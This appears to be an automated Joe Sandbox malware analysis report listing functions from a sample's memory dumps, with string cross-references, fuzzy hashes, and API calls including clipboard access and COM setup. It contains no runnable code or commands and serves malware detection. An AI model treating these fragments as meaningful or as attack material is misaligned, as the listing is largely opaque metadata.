=, xrefs: 00413440
|, xrefs: 004137E1
e, xrefs: 00413420
(, xrefs: 00412405
*, xrefs: 004134A8
Q, xrefs: 004130CD
$, xrefs: 004137F1

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: $ $ $ $!$"$"$"$"$$$$$$$&$&$&$'$($($*$*$*$,$,$,$-$.$.$.$.$0$0$2$2$3$4$4$4$4$5$6$6$7$8$8$8$9$9$:$:$:$<$=$>$@$D$D$D$E$G$I$I$K$K$M$O$P$Q$S$S$U$V$W$X$Y$Y$[$[$]$]$^$_$_$_$`$b$e$e$g$h$j$l$o$o$p$p$s$t$t$t$x$x$y$z$|$}
API String ID: 0-2173774466
Opcode ID: b9753955d8b0ad29877f9f28243419e93db33d3574ea54cea941ce0070e24877
Instruction ID: af53e175c28fad5d8c2a468ceeaa10e57feed0e13a8b405b96cf19100150d275
Opcode Fuzzy Hash: b9753955d8b0ad29877f9f28243419e93db33d3574ea54cea941ce0070e24877
Instruction Fuzzy Hash: BA13BE7160C7C08AD335DB38C4443AFBBE1ABD6314F188A6EE4D987392D6B98581CB57

Function 00435B98 Relevance: 85.4, Strings: 68, Instructions: 403COMMON

Download Yara Rule

Strings

M, xrefs: 00435D94
4, xrefs: 00435C30
h, xrefs: 00435C68
o, xrefs: 00435D1C
P, xrefs: 00435BC0
{, xrefs: 00435D4C
[, xrefs: 00435DCC
2, xrefs: 00435E28
?, xrefs: 00435CD8
%, xrefs: 00435DF4
-, xrefs: 00435E14
m, xrefs: 00435D14
u, xrefs: 00435D34
A, xrefs: 00435D64
9, xrefs: 00435C84
;, xrefs: 00435CB8
b, xrefs: 00435C3E
_, xrefs: 00435DDC
l, xrefs: 00435CF8
X, xrefs: 00435BF8
X, xrefs: 00435F16
g, xrefs: 00435CFC
', xrefs: 00435EFE
i, xrefs: 00435D04
d, xrefs: 00435EEE
", xrefs: 00435F06
p, xrefs: 00435CA0
9, xrefs: 00435CC0
', xrefs: 00435DFC
), xrefs: 00435E04
w, xrefs: 00435D3C
t, xrefs: 00435EE6
e, xrefs: 00435CF4
W, xrefs: 00435DBC
#, xrefs: 00435F0E
, xrefs: 00435C92
/, xrefs: 00435E1C
U, xrefs: 00435DB4
a, xrefs: 00435CE4
t, xrefs: 00435CB0
Q, xrefs: 00435DA4
3, xrefs: 00435E2C
s, xrefs: 00435D2C
c, xrefs: 00435CEC
0, xrefs: 00435C4C
S, xrefs: 00435DAC
Y, xrefs: 00435DC4
+, xrefs: 00435E0C
1, xrefs: 00435E24
), xrefs: 00435C5A
], xrefs: 00435DD4
k, xrefs: 00435D0C
#, xrefs: 00435DEC
h, xrefs: 00435BA4
6, xrefs: 00435CC8
O, xrefs: 00435D9C
y, xrefs: 00435D44
E, xrefs: 00435D74
C, xrefs: 00435D6C
}, xrefs: 00435D54
3, xrefs: 00435CA8
+, xrefs: 00435CD0
I, xrefs: 00435D84
G, xrefs: 00435D7C
!, xrefs: 00435DE4
8, xrefs: 00435C76
K, xrefs: 00435D8C
q, xrefs: 00435D24

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: $!$"$#$#$%$'$'$)$)$+$+$-$/$0$1$2$3$3$4$6$8$9$9$;$?$A$C$E$G$I$K$M$O$P$Q$S$U$W$X$X$Y$[$]$_$a$b$c$d$e$g$h$h$i$k$l$m$o$p$q$s$t$t$u$w$y${$}
API String ID: 0-2551631551
Opcode ID: 5571d7a2c4e6fe242554b8ee8fbc541d345d9774545682d32326d94ed6a6aae3
Instruction ID: 770335e5a42f9b4d615ca172ea7afd8b2f0587deb4f207754e917c3cbcfa6561
Opcode Fuzzy Hash: 5571d7a2c4e6fe242554b8ee8fbc541d345d9774545682d32326d94ed6a6aae3
Instruction Fuzzy Hash: 2C224121D087D98DDB22C67C884839DBFB11B67324F0843D9D4E96B3D2C7794A46CBA6

Function 004365B4 Relevance: 85.4, Strings: 68, Instructions: 398COMMON

Download Yara Rule

Strings

9, xrefs: 004366A1
4, xrefs: 0043664D
e, xrefs: 00436711
#, xrefs: 0043692B
X, xrefs: 00436933
', xrefs: 00436819
U, xrefs: 004367D1
-, xrefs: 00436831
l, xrefs: 00436715
p, xrefs: 004366BD
c, xrefs: 00436709
+, xrefs: 004366ED
E, xrefs: 00436791
[, xrefs: 004367E9
I, xrefs: 004367A1
_, xrefs: 004367F9
Y, xrefs: 004367E1
;, xrefs: 004366D5
i, xrefs: 00436721
w, xrefs: 00436759
0, xrefs: 00436669
", xrefs: 00436923
Q, xrefs: 004367C1
b, xrefs: 0043665B
#, xrefs: 00436809
8, xrefs: 00436693
W, xrefs: 004367D9
9, xrefs: 004366DD
g, xrefs: 00436719
C, xrefs: 00436789
!, xrefs: 00436801
t, xrefs: 00436903
2, xrefs: 00436845
y, xrefs: 00436761
s, xrefs: 00436749
u, xrefs: 00436751
X, xrefs: 00436615
), xrefs: 00436821
h, xrefs: 00436685
P, xrefs: 004365DD
{, xrefs: 00436769
, xrefs: 004366AF
?, xrefs: 004366F5
', xrefs: 0043691B
G, xrefs: 00436799
), xrefs: 00436677
6, xrefs: 004366E5
m, xrefs: 00436731
3, xrefs: 00436849
3, xrefs: 004366C5
/, xrefs: 00436839
A, xrefs: 00436781
], xrefs: 004367F1
O, xrefs: 004367B9
1, xrefs: 00436841
h, xrefs: 004365C1
d, xrefs: 0043690B
q, xrefs: 00436741
o, xrefs: 00436739
k, xrefs: 00436729
}, xrefs: 00436771
a, xrefs: 00436701
K, xrefs: 004367A9
t, xrefs: 004366CD
%, xrefs: 00436811
+, xrefs: 00436829
M, xrefs: 004367B1
S, xrefs: 004367C9

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: $!$"$#$#$%$'$'$)$)$+$+$-$/$0$1$2$3$3$4$6$8$9$9$;$?$A$C$E$G$I$K$M$O$P$Q$S$U$W$X$X$Y$[$]$_$a$b$c$d$e$g$h$h$i$k$l$m$o$p$q$s$t$t$u$w$y${$}
API String ID: 0-2551631551
Opcode ID: bf3661bb3983fb85d3086f1722b7d7b11c57bc7e0144b52ab0816061f3dab287
Instruction ID: de50ea2c20b4176c8acefd8da3a13ecea5557a43b1ccc23e89203943b2e10b97
Opcode Fuzzy Hash: bf3661bb3983fb85d3086f1722b7d7b11c57bc7e0144b52ab0816061f3dab287
Instruction Fuzzy Hash: 99225121D087DA8DDB22C67C884839DBFB11B67324F0843D9D4E96B3D2C7754A46CBA6

Function 0043506D Relevance: 39.1, Strings: 31, Instructions: 329COMMON

Download Yara Rule

Strings

S, xrefs: 00435224
>, xrefs: 004352F4
4, xrefs: 00435315
a, xrefs: 004351A6
m, xrefs: 004351FA
{, xrefs: 0043517C
c, xrefs: 0043535B
$, xrefs: 00435323
u, xrefs: 00435152
<, xrefs: 004352EB
o, xrefs: 00435208
U, xrefs: 00435331
n, xrefs: 00435121
e, xrefs: 004351C2
c, xrefs: 004351B4
i, xrefs: 004351DE
0, xrefs: 00435433
}, xrefs: 0043518A
Q, xrefs: 00435216
k, xrefs: 004351EC
g, xrefs: 004351D0
~, xrefs: 004350B1
q, xrefs: 00435136
w, xrefs: 00435160
R, xrefs: 0043521D
s, xrefs: 00435144
g, xrefs: 0043533F
y, xrefs: 0043516E
b, xrefs: 0043534D
1, xrefs: 0043520F
M, xrefs: 0043545E

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: $$0$1$4$<$>$M$Q$R$S$U$a$b$c$c$e$g$g$i$k$m$n$o$q$s$u$w$y${$}$~
API String ID: 0-379513683
Opcode ID: cfa054dc800593ef20723bf0e07abeb3e5f3e33d89c21528bf78c2c7209d6cbb
Instruction ID: fbc6194e022bf2d7584349dbc9d518ea0f683462fe8accb2f8c95ac37d1c220e
Opcode Fuzzy Hash: cfa054dc800593ef20723bf0e07abeb3e5f3e33d89c21528bf78c2c7209d6cbb
Instruction Fuzzy Hash: EBF1D2319087E98ADB36C63C8C543DDBEA25B56324F0843E9C4ED6B3D2C6B50BC58B56

Function 00657E27 Relevance: 30.4, APIs: 8, Strings: 9, Instructions: 639memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0044168C,00000000,00000001,0044167C,00000000), ref: 00658049
SysAllocString.OLEAUT32(?), ref: 006580AE
CoSetProxyBlanket.COMBASE(680742DE,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 006580F7
SysAllocString.OLEAUT32(?), ref: 0065814F
SysAllocString.OLEAUT32(F9BDF745), ref: 00658227
VariantInit.OLEAUT32(?), ref: 00658299
VariantClear.OLEAUT32(?), ref: 0065841F

Strings

0R/T, xrefs: 006582B3
Z>\, xrefs: 006582A3
/^&PZ>\, xrefs: 00658241
pyz{, xrefs: 00657E90
Gx, xrefs: 00658082
Ljkl, xrefs: 00657F13
/^&P, xrefs: 006582AB
C, xrefs: 00657FA9
ab, xrefs: 006582D3

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID: AllocString$Variant$BlanketClearCreateInitInstanceProxy
String ID: Z>\$/^&P$/^&PZ>\$0R/T$C$Gx$Ljkl$ab$pyz{
API String ID: 305737880-109390196
Opcode ID: f5650649af3bb8683cce130507ff282943505e9f99ba66872af77d97622111cc
Instruction ID: 3ed3e43aa9d4c46a872428491177f779113ec0c07e37af8da2f89c417cfc1d13
Opcode Fuzzy Hash: f5650649af3bb8683cce130507ff282943505e9f99ba66872af77d97622111cc
Instruction Fuzzy Hash: 4412DF72A083519FD320CF68C88579BBBE2EFC5714F194A2CE9D4A7790D774D8098B86

Function 006388A1 Relevance: 24.0, Strings: 19, Instructions: 222COMMON

Download Yara Rule

Strings

$rt, xrefs: 00638A00
*^,P, xrefs: 0063899D
:J4L, xrefs: 00638966
L.[ , xrefs: 00638B44
[&'8, xrefs: 00638B5A
V*H,, xrefs: 00638B39
k:~<, xrefs: 0063893A
Q>b0, xrefs: 00638945
+N;@, xrefs: 00638971
V%h, xrefs: 006389B3
r&f8, xrefs: 0063892F
g"w$, xrefs: 00638924
G6HH, xrefs: 0063895B
l*G,, xrefs: 0063890E
<F9X, xrefs: 00638987
X"\$, xrefs: 00638B4F
=Z$\, xrefs: 00638992
H2P4, xrefs: 00638950
~.p , xrefs: 00638919

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: V%h$$rt$*^,P$+N;@$:J4L$<F9X$=Z$\$G6HH$H2P4$L.[ $Q>b0$V*H,$X"\$$[&'8$g"w$$k:~<$l*G,$r&f8$~.p
API String ID: 0-2572281532
Opcode ID: f2b735d5565443e60b290a4db958f3dd542149773ac8ca26e3220f171de3171a
Instruction ID: 542e52c98d78f87613b66d1c36229ded97cddaf2e52e9c04a7f46e6d1065d192
Opcode Fuzzy Hash: f2b735d5565443e60b290a4db958f3dd542149773ac8ca26e3220f171de3171a
Instruction Fuzzy Hash: D4818DB29193918BC33A8F15C8953DFBBE2FBC0304F19892DC8999B255DB754606CB46

Function 00418638 Relevance: 24.0, Strings: 19, Instructions: 221COMMON

Download Yara Rule

Strings

g"w$, xrefs: 004186BD
=Z$\, xrefs: 0041872B
Q>b0, xrefs: 004186DE
*^,P, xrefs: 00418736
:J4L, xrefs: 004186FF
l*G,, xrefs: 004186A7
k:~<, xrefs: 004186D3
<F9X, xrefs: 00418720
X"\$, xrefs: 004188E8
G6HH, xrefs: 004186F4
V*H,, xrefs: 004188D2
H2P4, xrefs: 004186E9
$rt, xrefs: 00418799
r&f8, xrefs: 004186C8
L.[ , xrefs: 004188DD
[&'8, xrefs: 004188F3
V%h, xrefs: 0041874C
~.p , xrefs: 004186B2
+N;@, xrefs: 0041870A

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: V%h$$rt$*^,P$+N;@$:J4L$<F9X$=Z$\$G6HH$H2P4$L.[ $Q>b0$V*H,$X"\$$[&'8$g"w$$k:~<$l*G,$r&f8$~.p
API String ID: 0-2572281532
Opcode ID: bd7f63e964f488d677be3c97ab2ce72dca3788d71f0cf761aaeb2d60bf982ccf
Instruction ID: fc9c91e7f1a30bb03526ffdc58390b239219c7e1b2437cd68821ef081b52b0d4
Opcode Fuzzy Hash: bd7f63e964f488d677be3c97ab2ce72dca3788d71f0cf761aaeb2d60bf982ccf
Instruction Fuzzy Hash: B581BEB29193918BC33A8F15C8853DFBBE2FBC0304F59892DC4999B354DB754602CB4A

Function 00644D07 Relevance: 21.7, Strings: 17, Instructions: 445COMMON

Download Yara Rule

Strings

q#s%, xrefs: 006457AB
9:, xrefs: 006451B0
s'k), xrefs: 006457B6
B?y!, xrefs: 006457A0
l+j-, xrefs: 006457C1
,{+}, xrefs: 00645845
't+v, xrefs: 006454D3
bc, xrefs: 0064585B
SK, xrefs: 00644F7F
6<, xrefs: 00644E27
0s&u, xrefs: 0064582F
7w.y, xrefs: 0064583A
^T, xrefs: 00644F8A
U;W=, xrefs: 00645795
Z7W9, xrefs: 0064578A
>R, xrefs: 00644F74
;?, xrefs: 00644E32

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: 't+v$,{+}$0s&u$6<$7w.y$9:$;?$>R$B?y!$SK$U;W=$Z7W9$^T$bc$l+j-$q#s%$s'k)
API String ID: 0-416511104
Opcode ID: adba4028a27d79ef5c5b54763bf1222529bcdb3dd089f517822c49e845e26f1c
Instruction ID: 86aa4f248353420743ff50270109f0182dc4c6e9355fd76e44b5b4ce5fc30952
Opcode Fuzzy Hash: adba4028a27d79ef5c5b54763bf1222529bcdb3dd089f517822c49e845e26f1c
Instruction Fuzzy Hash: BE421AB520C3948AD334CF55D442BCFBAF2FB92304F00882DC5D9AB615DBB54A468B97

Function 00424AA8 Relevance: 21.7, Strings: 17, Instructions: 444COMMON

Download Yara Rule

Strings

bc, xrefs: 004255F4
^T, xrefs: 00424D23
l+j-, xrefs: 0042555A
6<, xrefs: 00424BC0
q#s%, xrefs: 00425544
>R, xrefs: 00424D0D
B?y!, xrefs: 00425539
SK, xrefs: 00424D18
,{+}, xrefs: 004255DE
0s&u, xrefs: 004255C8
7w.y, xrefs: 004255D3
Z7W9, xrefs: 00425523
s'k), xrefs: 0042554F
;?, xrefs: 00424BCB
U;W=, xrefs: 0042552E
9:, xrefs: 00424F49
't+v, xrefs: 0042526C

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: 't+v$,{+}$0s&u$6<$7w.y$9:$;?$>R$B?y!$SK$U;W=$Z7W9$^T$bc$l+j-$q#s%$s'k)
API String ID: 0-416511104
Opcode ID: 1d615baf16a5cb2da3b9dcf4c28b1abc6d5fa3844a44abe495e2c78bf808da89
Instruction ID: 3a13b98e1fcd4ee340008fd0ff9d0d16dd32adc4ff5d5dd5518182cac15cbb42
Opcode Fuzzy Hash: 1d615baf16a5cb2da3b9dcf4c28b1abc6d5fa3844a44abe495e2c78bf808da89
Instruction Fuzzy Hash: 2E420AB560C3948AD334CF55D442BCFBAF2FB92304F00882DC5D9AB615DBB54A468B9B

Function 00425691 Relevance: 21.7, Strings: 17, Instructions: 435COMMON

Download Yara Rule

Strings

9:, xrefs: 00425BC9
^T, xrefs: 004259A3
U;W=, xrefs: 0042619E
Z7W9, xrefs: 00426193
>R, xrefs: 0042598D
,{+}, xrefs: 0042624E
q#s%, xrefs: 004261B4
7w.y, xrefs: 00426243
SK, xrefs: 00425998
;?, xrefs: 0042584B
B?y!, xrefs: 004261A9
bc, xrefs: 00426264
't+v, xrefs: 00425EEE
s'k), xrefs: 004261BF
6<, xrefs: 00425840
0s&u, xrefs: 00426238
l+j-, xrefs: 004261CA

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: 't+v$,{+}$0s&u$6<$7w.y$9:$;?$>R$B?y!$SK$U;W=$Z7W9$^T$bc$l+j-$q#s%$s'k)
API String ID: 0-416511104
Opcode ID: 7025e020dc1be4b8a9aa057e7f4e20e478a06c8b1f4e692c69e1f3649ff6bb3a
Instruction ID: ca3b89ee566e4ff942ad83ab59672ef17daa3edc381adbb1ac583b775d9a42f8
Opcode Fuzzy Hash: 7025e020dc1be4b8a9aa057e7f4e20e478a06c8b1f4e692c69e1f3649ff6bb3a
Instruction Fuzzy Hash: 4A421CB520C3D48AC334CF54D442B9FBAF2FB92304F40882DC5D96B615DBB54A468B9B

Function 0063085A Relevance: 15.8, Strings: 12, Instructions: 815COMMON

Download Yara Rule

Strings

$, xrefs: 0063113F
N, xrefs: 00630FEF
n, xrefs: 006311FE
(, xrefs: 0063114F
(, xrefs: 00630DA2
l, xrefs: 0063120E
-, xrefs: 00631147
X, xrefs: 006308C8
A, xrefs: 00630DA7
I, xrefs: 00630E54
{, xrefs: 00631206
G, xrefs: 006309A9

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: $$($($-$A$G$I$N$X$l$n${
API String ID: 0-3018408179
Opcode ID: 20fecec664957fa8e958fc0b48a3ebd2b86fe6cf7a51e2b9ced4b28621d421dc
Instruction ID: 15cabfee5b3c2a716679521f7688dab466d3e6f18a9c5dfa689af8079b8edcdf
Opcode Fuzzy Hash: 20fecec664957fa8e958fc0b48a3ebd2b86fe6cf7a51e2b9ced4b28621d421dc
Instruction Fuzzy Hash: D162C57260D7908FD3649B3888953AEBBD2AFD5314F198A3DD8D9C73C2D67889058B43

Function 004105F3 Relevance: 15.8, Strings: 12, Instructions: 815COMMON

Download Yara Rule

Strings

(, xrefs: 00410EE8
N, xrefs: 00410D88
I, xrefs: 00410BED
$, xrefs: 00410ED8
-, xrefs: 00410EE0
n, xrefs: 00410F97
A, xrefs: 00410B40
G, xrefs: 00410742
X, xrefs: 00410661
(, xrefs: 00410B3B
l, xrefs: 00410FA7
{, xrefs: 00410F9F

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: $$($($-$A$G$I$N$X$l$n${
API String ID: 0-3018408179
Opcode ID: 5e103353c0778339808f6a7ca294803b546d41d14dbeded6291cd10cad3a3d9b
Instruction ID: 45de6dd5686d3479f9f5989f6b87c12e9a5a75427f0c78b35cf7a0a625548742
Opcode Fuzzy Hash: 5e103353c0778339808f6a7ca294803b546d41d14dbeded6291cd10cad3a3d9b
Instruction Fuzzy Hash: 4462D372A0D7908BC3249B3984853DFBBD2ABC5314F198A3ED9D9D73C1D67889818B47

Function 00641CE7 Relevance: 14.3, Strings: 11, Instructions: 597COMMON

Download Yara Rule

Strings

o, xrefs: 00641FDF
D, xrefs: 00641FC6
!@, xrefs: 00641D1D
m, xrefs: 00641FD5
n, xrefs: 00641FDA
,, xrefs: 006422D9
5, xrefs: 00642140
/, xrefs: 00642145
6, xrefs: 0064214A
k, xrefs: 00641FCB
B, xrefs: 00641FD0

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: !@$,$/$5$6$B$D$k$m$n$o
API String ID: 0-3097700080
Opcode ID: d14db685c42de0870d4f3f3b634c5b5a98c477aac6c67201ae2a51db1abd5241
Instruction ID: cd5f023326176292ef3dbea00721357cfa6f50caf724106c98e8e3fe513b693e
Opcode Fuzzy Hash: d14db685c42de0870d4f3f3b634c5b5a98c477aac6c67201ae2a51db1abd5241
Instruction Fuzzy Hash: 6032C07160C7818FD3248B68C4A136FFBE2ABC9314F68896DE5D6873C2D6B988458747

Function 00421A80 Relevance: 14.3, Strings: 11, Instructions: 597COMMON

Download Yara Rule

Strings

n, xrefs: 00421D73
D, xrefs: 00421D5F
k, xrefs: 00421D64
6, xrefs: 00421EE3
,, xrefs: 00422072
o, xrefs: 00421D78
B, xrefs: 00421D69
/, xrefs: 00421EDE
m, xrefs: 00421D6E
!@, xrefs: 00421AB6
5, xrefs: 00421ED9

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: !@$,$/$5$6$B$D$k$m$n$o
API String ID: 0-3097700080
Opcode ID: 359b3e2d534d2da6293d800b8eafe1b1fd86d14f64275b3f19adbfaf5cb2e09e
Instruction ID: dc28331636f64223628dcf67653152bfe71e102bd96d9b605168d7f034e00d79
Opcode Fuzzy Hash: 359b3e2d534d2da6293d800b8eafe1b1fd86d14f64275b3f19adbfaf5cb2e09e
Instruction Fuzzy Hash: DD32F17170C7908FD3248B28D49136FBBE1ABD9314F58892EE5D6873D2D6BD8841874B

Function 006573E7 Relevance: 12.8, Strings: 10, Instructions: 290COMMON

Download Yara Rule

Strings

%, xrefs: 006574AC
Y, xrefs: 006575CD
C, xrefs: 006575D7
), xrefs: 006574B1
v, xrefs: 0065745C
., xrefs: 006574B6
v, xrefs: 00657405
K, xrefs: 006575D2
?, xrefs: 006576D7
, xrefs: 006574BB

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: $%$)$.$?$C$K$Y$v$v
API String ID: 0-1948704018
Opcode ID: 9f716606c8118ff5923e3058c5eb05300d8b4fc38a581191a17a7c380467e32a
Instruction ID: 90e14e2058c38cd88d124f254dbcbac5427f9a4bf2a81130b3492b41e604949b
Opcode Fuzzy Hash: 9f716606c8118ff5923e3058c5eb05300d8b4fc38a581191a17a7c380467e32a
Instruction Fuzzy Hash: 5DA15B23A0C7D14AD311857D9C8425BEEC30BE6224F2ECBADD8E5873D6D579C90A8393

Function 00437180 Relevance: 12.8, Strings: 10, Instructions: 290COMMON

Download Yara Rule

Strings

, xrefs: 00437254
), xrefs: 0043724A
v, xrefs: 0043719E
Y, xrefs: 00437366
%, xrefs: 00437245
C, xrefs: 00437370
., xrefs: 0043724F
K, xrefs: 0043736B
?, xrefs: 00437470
v, xrefs: 004371F5

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: $%$)$.$?$C$K$Y$v$v
API String ID: 0-1948704018
Opcode ID: 9f716606c8118ff5923e3058c5eb05300d8b4fc38a581191a17a7c380467e32a
Instruction ID: f70cb8b5534ef894ef439ad6c336ad61d0d4793a511eb9a38b6a33aaea9181ad
Opcode Fuzzy Hash: 9f716606c8118ff5923e3058c5eb05300d8b4fc38a581191a17a7c380467e32a
Instruction Fuzzy Hash: 15A14D23A0C7D14AD321857D4C8425BEEC30BEA224F1ECB6ED8E5973C6D579C9069393

Function 004327B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004327C0
GetWindowLongW.USER32 ref: 004327E5
GetClipboardData.USER32 ref: 004327F5
GlobalLock.KERNEL32 ref: 0043280E
GlobalUnlock.KERNEL32 ref: 00432953
CloseClipboard.USER32 ref: 0043295E

Strings

T, xrefs: 0043289E

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: T
API String ID: 2832541153-3187964512
Opcode ID: f69b22f7e65234b8b8295d773221abc16353644711cc119bd34ed76aaf3f7017
Instruction ID: 2c952f62104fe5d4509db1f6639d41a4f4bf987f5331e4494cef66cb5abed10d
Opcode Fuzzy Hash: f69b22f7e65234b8b8295d773221abc16353644711cc119bd34ed76aaf3f7017
Instruction Fuzzy Hash: 6841E6B160C7818ED310AF7C998835FBED05B86324F044B3EE5E5862D2D6788689C79B

Function 00427780 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 453COMMON

Download Yara Rule

Strings

SO, xrefs: 0042804B
bH>,, xrefs: 00428310
'7lG, xrefs: 00428318
.;)9, xrefs: 00428308
V9!,, xrefs: 004283B1, 004283B5

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: '7lG$.;)9$SO$V9!,$bH>,
API String ID: 0-3057601594
Opcode ID: f4cdaa063ef63a08f5c8637429504917e8d476f17a17340cae0ae6187bec57d9
Instruction ID: 89be8276579ee34aed10616cce504172f3d28cd0adcf7ab04e391ecd321fe4a1
Opcode Fuzzy Hash: f4cdaa063ef63a08f5c8637429504917e8d476f17a17340cae0ae6187bec57d9
Instruction Fuzzy Hash: 60E1EDB5A0D750CFD3209F25E80176BBAE1FBC5304F05896DE6D89B361EB388905CB96

Function 0063A3B7 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1622COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0063AA61
FreeLibrary.KERNEL32(?), ref: 0063AB02

Strings

N@, xrefs: 0063A881
AB, xrefs: 0063A889
I,~M, xrefs: 0063B46A

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: AB$I,~M$N@
API String ID: 3664257935-1338355008
Opcode ID: 401f91f6926f723cc129c0a677715be08141d873c4625b0886a64bef750105ec
Instruction ID: b42683254d8ec628497c2619b98cbab720f92d80f5e5700a4d98889a835f1ecd
